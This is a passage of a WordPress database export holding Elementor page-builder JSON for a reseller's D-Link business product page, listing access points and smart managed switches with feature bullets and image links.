\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"282\",\"right\":\"282\",\"bottom\":\"282\",\"left\":\"282\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"68\",\"right\":\"68\",\"bottom\":\"68\",\"left\":\"68\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7466,3395,'_elementor_version','2.5.14'),(7467,3395,'_elementor_edit_mode','builder'),(7470,3396,'_wp_page_template','template-fullwidth.php'),(7471,3396,'_elementor_template_type','post'),(7472,3396,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central 